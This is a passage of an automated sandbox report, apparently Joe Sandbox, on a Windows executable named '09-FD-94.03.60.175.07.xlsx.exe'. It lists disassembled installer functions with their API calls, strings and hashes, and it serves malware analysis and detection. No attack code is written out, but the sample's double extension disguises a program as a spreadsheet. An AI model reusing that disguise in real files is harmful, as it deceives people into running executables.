                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                          • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                          • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                          • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                          Function 004061DC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 0040623F
                                                          • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                          • CharNextW.USER32(?,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00406253
                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 00406266
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-3897275176
                                                          • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                          • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                          • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                          • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                          Function 004024EE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,?,?,?,00000021), ref: 0040252F
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,?,?,?,00000021), ref: 00402536
                                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: ByteCharFileMultiWideWritelstrlen
                                                          • String ID: 8$C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp$C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll
                                                          • API String ID: 1453599865-2185136702
                                                          • Opcode ID: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                          • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                          • Opcode Fuzzy Hash: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                          • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
                                                          Function 00404201 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                          • GetSysColor.USER32(00000000), ref: 0040423A
                                                          • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                          • SetBkMode.GDI32(?,?), ref: 00404252
                                                          • GetSysColor.USER32(?), ref: 00404265
                                                          • SetBkColor.GDI32(?,?), ref: 00404275
                                                          • DeleteObject.GDI32(?), ref: 0040428F
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                          • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                          • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                          Function 004027E5 Relevance: 10.6, APIs: 7, Instructions: 75memoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00402809
                                                          • CloseHandle.KERNEL32(?), ref: 0040288F
                                                            • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                          • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 00402825
                                                          • GlobalFree.KERNEL32(?), ref: 0040285E
                                                          • WriteFile.KERNEL32(?,00000000,?,?), ref: 00402870
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                            • Part of subcall function 00403062: SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                            • Part of subcall function 00403062: WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,?,00000004,00000000,00000000,?,?), ref: 00403115
                                                          • DeleteFileW.KERNEL32(?), ref: 004028A3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$Global$AllocFreePointerWrite$AttributesCloseCreateDeleteHandle
                                                          • String ID:
                                                          • API String ID: 64603807-0
                                                          • Opcode ID: 0ae5610b60e6d4e17f9dac3ea963c7d8fcfadd954a58792ee9e4497ece00f648
                                                          • Instruction ID: 618f9bc0fb3bf7a155370674c03f3081ddbeebb813ad2def4b435a70289f4265
                                                          • Opcode Fuzzy Hash: 0ae5610b60e6d4e17f9dac3ea963c7d8fcfadd954a58792ee9e4497ece00f648
                                                          • Instruction Fuzzy Hash: D4215C72C00118BFDF11AFA4CD89CAE7E79EF08364B14463AF5147A2E0C6795E419BA9
                                                          Function 00402D1A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                          • GetTickCount.KERNEL32 ref: 00402D53
                                                          • wsprintfW.USER32 ref: 00402D81
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                            • Part of subcall function 00402CFE: MulDiv.KERNEL32(0001E4F1,?,00023D98), ref: 00402D13
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                                          • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                          • Opcode Fuzzy Hash: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                                          • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                          Function 00404ABC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                          • GetMessagePos.USER32 ref: 00404ADF
                                                          • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                          • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                          • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                          Function 00401D41 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401D44
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                          • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID: Times New Roman
                                                          • API String ID: 3808545654-927190056
                                                          • Opcode ID: 328d0a0e3b8fd706af101f3e54d1a8063c16bff27e2a5ea666199fad01018b80
                                                          • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                          • Opcode Fuzzy Hash: 328d0a0e3b8fd706af101f3e54d1a8063c16bff27e2a5ea666199fad01018b80
                                                          • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                          Function 00402C7F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                          • wsprintfW.USER32 ref: 00402CD1
                                                          • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 1451636040-1158693248
                                                          • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                          • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
                                                          • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                          • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                          Function 100022D0 Relevance: 9.1, APIs: 6, Instructions: 136memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                          • GlobalAlloc.KERNEL32(?), ref: 10002397
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1608943585.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1608921207.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1608963992.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1609013607.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                          • String ID:
                                                          • API String ID: 4216380887-0
                                                          • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                          • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                          • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                          • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                          Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                          • GlobalFree.KERNEL32(?), ref: 10002572
                                                          • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1608943585.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1608921207.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1608963992.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1609013607.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                          • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                          • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                          • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                          Function 004049D6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                          • wsprintfW.USER32 ref: 00404A70
                                                          • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$&B
                                                          • API String ID: 3540041739-2907463167
                                                          • Opcode ID: caf30eb243818e554a1bc62297d78279ecb515a66f5f6d95e05013f04c063739
                                                          • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                          • Opcode Fuzzy Hash: caf30eb243818e554a1bc62297d78279ecb515a66f5f6d95e05013f04c063739
                                                          • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
